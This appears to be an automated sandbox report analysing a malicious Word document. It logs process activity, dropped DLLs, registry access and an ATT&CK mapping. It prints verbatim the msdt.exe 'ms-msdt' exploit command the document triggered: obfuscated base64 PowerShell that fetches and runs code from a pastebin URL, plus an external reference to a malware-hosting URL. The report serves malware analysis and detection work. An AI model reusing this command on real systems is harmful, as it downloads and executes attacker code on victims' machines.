          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.cmdline
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.cmdline
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.cmdline

          Persistence and Installation Behavior

          barindex
          Contains an external reference to another file
          Source: document.xml.relsExtracted files from sample: https://www.malwarejake.com/456.html!
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\DiagPackage.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.dllJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\DiagPackage.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dllJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.dllJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1704Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTOJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP"Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		11
          Process Injection          		11
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts23
